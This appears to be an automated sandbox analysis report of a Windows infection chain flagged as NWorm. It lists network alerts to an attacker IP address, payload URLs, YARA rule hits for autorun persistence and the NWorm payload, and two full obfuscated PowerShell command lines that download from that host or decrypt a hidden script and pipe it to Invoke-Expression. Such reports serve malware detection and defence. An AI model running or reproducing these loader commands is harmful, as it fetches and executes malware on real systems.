Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186

Source: wscript.exe	String found in binary or memory: HttP://103.151.125.186/A/XADOUYJBEAAKTPUBATDKPHHPFWQWHBJ
Source: wscript.exe, wscript.exe, 00000001.00000003.470737081.000001BBED357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.472638560.000001BBED364000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.473168494.000001BBED252000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.471383208.000001BBED360000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.473162831.000001BBED250000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.473132648.000001BBEB518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.473248081.000001BBED368000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.473226905.000001BBED350000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451643862.000001AD006B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.455125627.000001AD00FDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451931858.000001AD00798000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451677265.000001AD006D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451854385.000001AD0074C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.450660208.000001AD00216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.454770397.000001AD00E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451774731.000001AD00719000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451897849.000001AD00783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.451552612.000001AD0066C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.454796011.000001AD00E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.448721449.000001AD6AE73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: HttP://103.151.125.186/C/Ps1JDK.txt
Source: powershell.exe, 00000002.00000002.450660208.000001AD00216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.151.125.186
Source: powershell.exe, 00000002.00000002.450660208.000001AD00216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.151.125.186/C/Ps1JDK.txt
Source: powershell.exe, 00000002.00000002.462983267.000001AD10063000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.151.125.186/C/Serverjdkd.txt
Source: powershell.exe, 00000002.00000002.462983267.000001AD10063000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: javaw.exe, 00000017.00000003.723499246.0000000014C6B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000017.00000003.735983763.0000000014C94000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000017.00000003.683418915.0000000014C6B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000017.00000003.724166250.0000000014C84000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000017.00000003.735639129.0000000014C6B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000017.00000003.696189919.0000000014C94000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000017.00000003.708561274.0000000014C6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://null.oracle.com/
Source: powershell.exe, 00000002.00000002.450660208.000001AD00216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.369565083.000001AD6AE02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.450338563.000001AD00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.450660208.000001AD00216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.369565083.000001AD6AE02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.462983267.000001AD10063000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.462983267.000001AD10063000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.462983267.000001AD10063000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.450660208.000001AD00216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.369565083.000001AD6AE02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.462983267.000001AD10063000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: 7.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 2.2.powershell.exe.1ad00a6df58.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 2.2.powershell.exe.1ad00a6df58.2.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 2.2.powershell.exe.1ad00d7d970.3.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 2.2.powershell.exe.1ad00d7d970.3.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 2.2.powershell.exe.1ad00a6df58.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 2.2.powershell.exe.1ad00a6df58.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 7.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 2.2.powershell.exe.1ad005bda68.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 2.2.powershell.exe.1ad005bda68.1.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 2.2.powershell.exe.1ad00d7d970.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 2.2.powershell.exe.1ad00d7d970.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 7.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 7.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 7.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 2.2.powershell.exe.1ad005bda68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 2.2.powershell.exe.1ad005bda68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 2.2.powershell.exe.1ad005a9550.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 2.2.powershell.exe.1ad005a9550.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NWorm/N-W0rm payload Author: ditekSHen
Source: 00000007.00000000.442084442.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000007.00000000.441493494.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000002.00000002.451128327.000001AD00472000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000002.00000002.454898865.000001AD00EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000002.00000002.454106266.000001AD00A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000007.00000000.442383411.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000007.00000000.441817870.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: aspnet_regbrowsers.exe PID: 4584, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://103.151.125.186/C/Ps1JDK.txt';Function RRBP([string] $KUFB) {$sFKU = [system.Collections.Generic.list[Byte]]::new();for ($AHYV = 0; $AHYV -lt $KUFB.lengtH; $AHYV +=8) {$sFKU.Add([Convert]::ToByte($KUFB.substring($AHYV, 8), 2))}return [system.Text.encoding]::AsCII.Getstring($sFKU.ToArray())};$eZHV = RRBP 'OWUT1OWUT11OWUT11OWUT111OWUTOWUT11OWUT111OWUT1OWUTOWUTOWUT1OWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUT1OWUTOWUT111OWUTOWUT1OWUTOWUTOWUT111OWUT1OWUT111OWUT1OWUTOWUT111OWUT1OWUTOWUTOWUT111OWUT1OWUTOWUT11OWUT1OWUT1OWUTOWUT11OWUT1111OWUT1OWUTOWUT1OWUTOWUT1OWUT11OWUT111OWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUTOWUT111OWUTOWUT1OWUTOWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT11OWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT11OWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOW
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://103.151.125.186/A/XADOUYJBEAAKTPUBATDKPHHPFWQWHBJLCEQYKYQXBJVCJFSNIPCUFQWRZQJZZYQWQEIBENEICJLDKPFNEZHXDQGDNDQTJNAPYHD.TXT';( [rUNtIMe.iNTerOpsERVices.mArsHAl]::([rUNtIMe.iNTErOpservIces.MArsHAL].GetMEMbERs()[1].nAMe).Invoke( [rUNtIMe.iNTErOpseRvIces.mArSHAL]::sECURESTRINgtogloBALAlLoCANsI($('76492d1116743f0423413b16050A5345MgB8AHMARgBJAEQATQBLAHMAUQBNAHUASQB0AEIASwBNADcASwBrAGsAVQBpAHcAPQA9AHwAZABhADAAZgA4ADgAZgA2AGQAYgBhADkAMQBmAGQAOQAzAGYAMAA0ADUAOQAzADUANwBiAGQAMwA4ADcAMwAxADEAYwA2AGMAYwA0ADAAZgBlAGYANQBjAGIAYwA3ADkANgBkADIAOQBhADYAZAAyAGMAYgAzADAAOQA2AGIANgBmADEAZgBhAGQAMgAzADcAMwA4AGUAMwBjAGUANwBhADIAZQBiAGEANQBmADIANAAwADEAMQA0AGIAZAAyADkAYwA3ADAANQA4AGIAYQBiAGYAYwAxADQANAAzAGMANwBkADIAMwA0ADQAMABlADQAMQA3AGYANgBiAGEAZQAyAGUANwBlADIAZQA3ADIAMgBmAGUAZAAwADkANgA3ADcAMwA1ADQAMAA5ADcANgA0ADUAOQBkADcAMwAzAGQAOAA3AGUAYwA2ADYAZABhADUANAA0ADcAMwA2ADQAZABhADAAMgA2AGQAMQA5AGQAMgBlADkAZQAyADMAMgBhADEANgAyADcAMAA2AGQAMAA2AGIAYwBjADIANwAwAGQAZgBjAGEAZAAxAGYANQBhADcAOAA5ADIANQBhADQANAAyAA==' \| CONVeRTTo-SECUrEStrIng -kE 90,255,13,102,31,9,186,211,78,88,189,227,80,105,238,83,62,34,152,160,216,150,239,195))))\| IeX
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://103.151.125.186/C/Ps1JDK.txt';Function RRBP([string] $KUFB) {$sFKU = [system.Collections.Generic.list[Byte]]::new();for ($AHYV = 0; $AHYV -lt $KUFB.lengtH; $AHYV +=8) {$sFKU.Add([Convert]::ToByte($KUFB.substring($AHYV, 8), 2))}return [system.Text.encoding]::AsCII.Getstring($sFKU.ToArray())};$eZHV = RRBP 'OWUT1OWUT11OWUT11OWUT111OWUTOWUT11OWUT111OWUT1OWUTOWUTOWUT1OWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUT1OWUTOWUT111OWUTOWUT1OWUTOWUTOWUT111OWUT1OWUT111OWUT1OWUTOWUT111OWUT1OWUTOWUTOWUT111OWUT1OWUTOWUT11OWUT1OWUT1OWUTOWUT11OWUT1111OWUT1OWUTOWUT1OWUTOWUT1OWUT11OWUT111OWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUTOWUT111OWUTOWUT1OWUTOWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT11OWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT11OWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOW	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7725
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7725			Jump to behavior

Source: amsi32_10432.amsi.csv, type: OTHER	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 7.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 2.2.powershell.exe.1ad00a6df58.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 2.2.powershell.exe.1ad00a6df58.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 2.2.powershell.exe.1ad00d7d970.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 2.2.powershell.exe.1ad00d7d970.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 2.2.powershell.exe.1ad00a6df58.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 2.2.powershell.exe.1ad00a6df58.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 7.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 2.2.powershell.exe.1ad005bda68.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 2.2.powershell.exe.1ad005bda68.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 2.2.powershell.exe.1ad00d7d970.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 2.2.powershell.exe.1ad00d7d970.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 7.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 7.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 7.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 2.2.powershell.exe.1ad005bda68.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 2.2.powershell.exe.1ad005bda68.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 2.2.powershell.exe.1ad005a9550.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
